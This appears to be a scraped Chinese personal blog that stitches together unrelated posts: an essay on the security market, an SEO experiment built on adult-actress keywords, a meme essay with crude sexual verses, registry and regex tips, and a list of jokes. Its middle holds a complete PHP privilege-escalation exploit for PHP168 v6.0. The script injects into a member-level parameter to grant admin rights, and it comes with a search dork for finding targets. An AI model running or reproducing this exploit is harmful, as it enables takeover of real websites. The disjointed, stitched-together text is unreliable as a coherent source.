Chinadu`s Blog

对于企业来说，到底是产品决定服务，还是服务决定产品？目前国内的安全市场比较混乱，随着安全行业逐渐被企业所重视，这很大一部分的功劳归功于黑客们，是他们让企业提高了安全意识，谁说 Hacker 都是反面的呢？对于安全厂商来说，没有黑客的攻击事件，安全厂商怎么去推他们的产品和服务呢？

从目前国内的安全市场来看，大大小小的安全公司不计其数，但大的厂家就那么几家，例如启明星辰、绿盟、安氏、天融信等等，而很多安全厂商又有多少是真正从用户的角度来考虑问题呢？目前各大安全厂商的做法都大致相同，都是由服务来推动产品。熟悉安全行业的朋友都知道，服务赚不了什么钱，而像启明这样规模的公司如果单纯靠服务来养活是完全不可能的，所以很多公司都由一个安全服务提供商转变为一个安全厂商。在安全行业刚起步时，很多公司还能遵循一定的职业守则，真正为用户所考虑，而随着竞争越来越激烈，很多公司已经渐渐转变了最初的思想。安全服务变得越来越廉价，服务只是用来推动产品的销售而已。

而近两年来，安全市场出现恶意竞争的行为。当一个客户发出安全招标书后，会邀请各大安全公司前来竞标。往往一个客户预算在 30 万的项目，有的公司竟然报到 5 万。这样会让用户感到很迷茫，这安全服务是怎么了？到底值多少钱？很多公司看中不是前期安全服务所能赚的钱，而是后期的安全建设过程中产品所带来的利润，产品所带来的利润远远比服务要多的多，这也是近年来很多公司都开始研发产品的原因。

纵观目前国内的安全市场，各种各样的产品不计其数，IDS、IPS、UTM、日志审计、桌面管理、安全网关等等，让用户都觉得这么多种类的安全产品，对企业来说就真的都需要么？

从用户的角度来看，产品只是为了方便管理，提高企业的安全性而已，而安全服务只是用来帮助企业发现自身存在的安全隐患。不管是产品还是服务，对于企业来说最终的目的只有一个那就是提高安全性，降低风险。从资金投入角度来讲，企业应根据自身的实际情况来取舍，安全服务和产品到底谁的优先级跟高。

从企业的角度来看，产品的销售可以养活一个公司，可以为公司带来更多的利润，而安全服务只是用来销售产品的一种手段。很少有公司将安全服务作为企业的重点支柱。除了像 IBM、德勤、毕马威、普华永道这样的公司会为企业做专门的安全咨询或审计。从这些公司的情况来看，他们的安全咨询足以用来养活一个公司了。

所以总结来看，目前国内做中端市场的安全公司，多以产品为主，服务为辅。做高端市场的安全咨询公司，如四大这样的，都是以作安全咨询为主。但不管是偏向于做安全产品还是做安全咨询，还是应该真正从用户的角度出发，切实的帮助用户解决问题。这样带来的才是长期的利益。

 

by Ryat
http://www.wolvez.org
2009-07-17

天天上班,好久没在论坛发贴了...

以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段
直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)

EXP:

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t31\t\t";
        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

        $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."do/login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

BANG5B1341E989FB9314F36771BAXIANGUO

请注意本文完全出于 SEO 不喜欢的可以略过！同时也是本站的第一个 SEO 实验，稍后我会在文章中透露实验的结果。各位不要想歪了哈。

之所以选择松岛枫和武藤兰这两个关键词，是我在 Google 趋势上经过仔细思分析后的结果，用了一个小时的时间最终从众多日本 AV 女优中选出了在中国搜索量前五位的 AV 明星：武藤兰、松岛枫、小泽玛利亚、苍井空和爱田由。
武藤兰虽然趋势指数很高，但是从上图中可以看出关键词的流行度正在走下坡路，而松岛枫在韩寒事件的推动下在中国的人气不断攀升。

标题的选择对于 SEO 来说非常重要，通常热度高的关键词不容易做出排名，所以我决定避其锋芒，选择类似松岛枫全集 BT 下载、武藤兰电影 BT 下载之类的扩展关键词，于是就有了“松岛枫、武藤兰电影全集 BT 下载”这样的标题。

关键词的密度当然也要控制在合理的水平，经过我周密的统计，本文的主要关键词密度都控制在合理的范围之内：武藤兰和松岛枫的密度均为1.5%左右。

剩下的就是 Meta 标签的写法，由于搜索引擎对 Keywords 标签已经不是非常之感冒，所以这个标签我只写下了：日本 AV 女优、松岛枫全集 BT 下载

vs2003到2008各版本如下：

vs.net2003

Visual Studio .NET 2003 Enterprise Architect

Visual Studio .NET 2003 Enterprise Developer

Visual Studio .NET 2003 Professional

VS2005

Visual Studio 2005 Professional

Visual Studio 2005 Standard

Visual Studio 2005 Team Edition for Database Professionals

Visual Studio 2005 Team Edition for Software Architects

Visual Studio 2005 Team Edition for Software Developers

Visual Studio 2005 Team Edition for Software Testers

Visual Studio 2005 Team Suite

VS2008

Visual Studio 2008 Express Editions

Visual Studio 2008 Professional Edition

Visual Studio 2008 Standard Edition

Visual Studio Team System 2008 Architecture Edition

Visual Studio Team System 2008 Database Edition

Visual Studio Team System 2008 Development Edition

Visual Studio Team System 2008 Team Suite

Visual Studio Team System 2008 Test Edition

Visual Studio Team System 2008 Test Load Agent

我个人很喜欢这种网络亚文化现象，当网络越来越主流的时候，这种不断生灭的亚文化形态就显得分外迷人。此前，Mop上就出现过围绕猥琐男的PS而产生的猥琐神教，在天涯也出现过针对郭敬明的菊花教。和以往明显带有不屑和嘲弄的态度不同，春哥教所包含的情感更为复杂有趣。

中国人喜欢两分法，好或者坏，喜欢或者不喜欢。严格说来，会有喜欢、无所谓、讨厌三种判断。人们的情绪和判断是按照这个线性序列变化和排列的。但是，这种单线式的情感在春哥教的问题上遭遇了挑战。成为春哥教众的人，并非是讨厌，也非喜欢李宇春。他们真正喜欢的，是“春哥”这个概念。春哥和李宇春关系其实并不大，而是从李宇春出发，大家集体无意识地创造出了一个新人“春哥”。这个人有以下特质：

帅
很Man
眼神霸气
神力无敌
可以粉碎一切反对的力量。

从这里开始，衍生出一系列演义故事：

1、若问春哥多强壮？伸直双臂过火车十九练竞速，追随火箭跑。二十进男足，断子绝孙脚。春哥上场皆畏缩，巴西德国俱投降。若问爷们力多大？一呼一吸龙卷风三十学瞳术，虐杀写轮眼。四十喜背书，大英图书馆。宇春挥手造宇宙，万物俯首拜英雄。

2、春哥纯爷们，铁血真汉子。一岁能杀鸡，三岁造飞机。五岁开坦克，六岁穿铁衣。四境百里传春哥，人人闻风而丧胆。若问汉子谁能敌？个个摆手面色惊十岁练武打，十二会做法。十五懂发电，眨眼数百瓦。浑身肌肉展雄姿，意气风发震四海。

3、春哥纯爷们，铁血真汉子，人民好兄弟，父亲好儿子，拳上能站人，命根能走马，胸口碎大石，菊花开瓶盖，一年硬两次，一次整半年，三秒一勃起，一分两炮精，敢干芙蓉女，能爆棒子菊，胯下草泥马，手中达菲鸡，爆菊不眨眼，中出不喘息，整晚整晚日，全天全天射。

分析这些内容，你很难说网友对春哥是喜欢还是讨厌。他们的态度更像是从喜欢到无所谓的中点，随时往返跃迁与从无所谓到讨厌的中点。同时把几种完全风马牛不相及的情绪揉合在一起，通过春哥教的崇拜方式来表达出来。因此，也就有了各种“祷告”形势：

1、信春哥，得永生。
2、信春哥，不挂科。
3、信春哥，上本科；卸绿坝，上北大。
4、新春哥，死后原地满血复活。
5、昨天我还不信春哥，今天我信了，真的就。。。。。。。（具体事例）

可以看出，春哥教要比二十年前的“无厘头”更为无厘头，发展的线索更为微妙曲折。借用春哥这个概念，人们可以表达不满，也可以表达对生活的感激。可以演变为虔敬的心态，但是又同时能保持高度的嘲弄。昨天晚上，根据这段时间我对春哥教的认知，我也编写了一段主祷词：

信春哥，得永生！感谢春哥赐予我Google，愿她的名字行在网上，如同行在地上一样。每日的网站，你赐予我。免我的费，如同我们免别人的费。不叫我们遇见五毛。救我们脱离GFW。因为国度、权柄、荣耀，全是你的，直到永远！阿门！

春哥教这个概念我觉得很不错，准备用上一个时期。李宇春的粉丝也许会觉得不爽，不过，春哥教真的和你们的偶像没有多少关系。你们觉得春哥教是对李宇春的小恶意，小讽刺。而事实是，你们的李宇春只是春哥教的一个小注脚，别把自己太当回事了。

信春哥，得永生，股票今天真的赚了。

关闭

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"=""

打开

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"="\\Device\\"

重启生效

搜索 url(.+\/([0-9a-z]+)\.(jpg|png|gif))\)
替换成 url(images/\2.\3)
就是把类似 url(http://image.chinahtml.com/images/icon.gif) 替换成 url(images/icon.gif)

1、执子之手，方知子丑，泪流满面，子不走我走。

　　2、西游记告诉我们：凡是有后台的妖怪都被接走了，凡是没后台的都被一棒子打死了。

　　3、你有什么不开心的事？说出来让大家开心一下。

　　4、我那么喜欢你，你喜欢我一下会死啊。

　　5、我又不是人民币，怎么能让人人都喜欢我？！

　　6、令人不能自拔的，除了牙齿还有爱情。

　　7、当生活心怀歹毒地将一切都搞成了黑色幽默，我顺水推舟把自己变成了一个受过高等教育的流氓。

　　8、时间太瘦，指缝太宽。

　　9、小姑娘们梦中都想找一匹白马，睁开眼发现满世界都是灰不溜秋的驴，悲痛欲绝后，只能从驴群中挑个身强力壮的，这样的驴就被命名为：经济适用男 。

　　10、我就要哭，我就要闹，一宿一宿不睡觉，手里拿瓶安眠药，拿根小绳要上吊。再丑也要谈恋爱，谈到世界充满爱。

　　11、我们的目标：向钱看，向厚赚。

　　12、我是你转身就忘的路人甲，凭什么陪你蹉跎年华到天涯？

　　13、没有医保和寿险的，天黑后不要见义勇为……

　　14、挤公交是包含散打、瑜珈、柔道、平衡木等多种体育和健身项目于一体的综合性运动。

　　15、老娘法眼一开就知道你是个妖孽了。

　　16、手插口袋，谁都不爱 。

　　17、手拿菜刀砍电线，一路火花带闪电。

　　18、单身并不难，难的是应付那些千方百计想让你结束单身的人 。

　　19、幸福是什么?幸福就是你吃鱼,我吃肉,看着别人啃骨头。

　　20、念了十几年书，想起来还是幼儿园比较好混！

　　21、我当年也是个痴情的种子，结果下了场雨……淹死了。

　　22、很多人说婚姻是爱情的坟墓，但是能够入土为安的爱情总比暴尸街头要好 。

　　23、有空学风水去，死后占个好墓也算弥补了生前买不起好房的遗憾

　　24、据说，人只有两个选择，忙着死或是忙着活，我想我有了第三种选择：忙着等死 。

　　25、春困夏乏秋无力，冬日正好眠。

　　26、思念不能自已，痛苦不能自理，结果不能自取，幸福不能自予。

　　27、小时候我以为自己长大后可以拯救整个世界，等长大后才发现整个世界都拯救不了我。

　　28、如果你注定不能给予我期待的回应.那么就保持在安全距离之外吧。

　　29、请不要把我对你的容忍，当成你不要脸的资本。

　　30、女子无才便是德，我一定是太缺德了。

　　31、诸葛亮出山前也没带过兵啊，你们凭啥要我有工作经验。

　　32、用嘻哈的蓝调精神来过二胡一样的生活。

　　33、鸵鸟的幸福，只是一堆沙子。

　　34、老天，太蓝！大海，太咸！人生，太难！工作，太烦！和你，有缘！想你，失眠！见你，太远！

　　35、一觉醒来，天都黑了。

　　36、喝药递瓶，上吊给绳，跳楼的挥着小手绢送行。

　　37、铁杵能磨成针，但木杵只能磨成牙签，材料不对，再努力也没用。

　　38、你要搞清楚自己人生的剧本——不是你父母的续集，不是你子女的前传，更不是你朋友的外篇。

　　39、树愈静而风不止，我愈恋而他不在。

　　40、多想某天醒来睁开眼，发现自己坐在小学教室的课桌椅上。老师掷来的粉笔头正好打在额头上。

　　41、少年不胡作妄为，大胆放肆，试问老年时哪来的题材话当年。

　　42、作为一个怪兽，我的愿望是至少消灭一个奥特曼。

　　43、再过几十年 我们来相会 送到火葬场 全部烧成灰 你一堆我一堆 谁也不认识谁 全部送到农村做化肥~

　　44、学问之美，在于使人一头雾水；诗歌之美，在于煽动男女出轨；女人之美，在于蠢得无怨无悔；男人之美，在于说谎说得白日见鬼。

　　45、我以为我很颓废,今天我才知道,原来我早报废了。

　　46、不成熟男人的标志是可以为了理想壮烈的牺牲，成熟男人的标志的可以为了理想卑贱的活着。

　　47、生活就像宋祖德的嘴，你永远都不知道下一个倒霉的会是谁。

　　48、阳光温热，岁月静好，你还不来，我怎敢老去？

　　49、人又不聪明，还学别人秃顶。

　　50、我以神的姿态,闪耀在这美的瞬间.凡人勿扰…

　　51、年轻的时候，我们常常冲着镜子做鬼脸；年老的时候，镜子算是扯平了。

　　52、要努力！！为了你的奥迪我的迪奥。

　　53、我是白领：今天领了薪水，交了房租水电，买了油米泡面，摸了口袋，感叹一声，这个月工资又白领了…

　　54、执子之手，将子拖走。子说不走，好吧，关门放狗！

　　55、生活,就是这样.永远占领着绝对领导的位置,当无数的傻子高呼着自己控制了生活,掌握了命运.却没看到,生活在更高的苍穹上.露出讥笑的嘲讽的面孔。

　　56、他就是一盆水，倒入你的米堆里，若干年后，清水变成了醇香的酒，而你变成了一堆废弃的烂米，不是没用了，还可以拿来喂猪的。

　　57、不愿做奴隶的人民，愿做人民币的奴隶。

　　58、我不是天桥上算命的，唠不出那么多你爱听的磕。

　　59、生活二字二几十年来回味得我大小脑抽搐，脊髓痉挛。始终不得要领。

　　60、真的猛士，敢于直面自己未化妆的脸。

　　61、天山童姥——外表正太，内心却有三百六十五道裂痕，每道裂痕上书春夏秋冬四字，沧桑到妖。

　　62、世事往往如此，想回头也已经来不及，即使你肯沦为劣马，不一定有回头草在等着你。

　　63、曾经我们都以为自己可以为爱情死，其实爱情死不了人，它只会在最疼的地方扎上一针，然后我们欲哭无泪，我们辗转反侧，我们久病成医，我们百炼成钢。你不是风儿，我也不是沙，再缠绵也到不了天涯，擦干了泪，明天早上，我们都要上班。

　　64、曾经和朋友一起仰望星空，随之我们泪流满面，他是因为失恋，我则是因为扭伤了脖子。

　　65、其实你我都一样，人人都在装，关键是要装像了，装圆了，有一个门槛，装成了就迈进去，成为传说中的性情中人，没装好，就卡在那里了。就是卡门。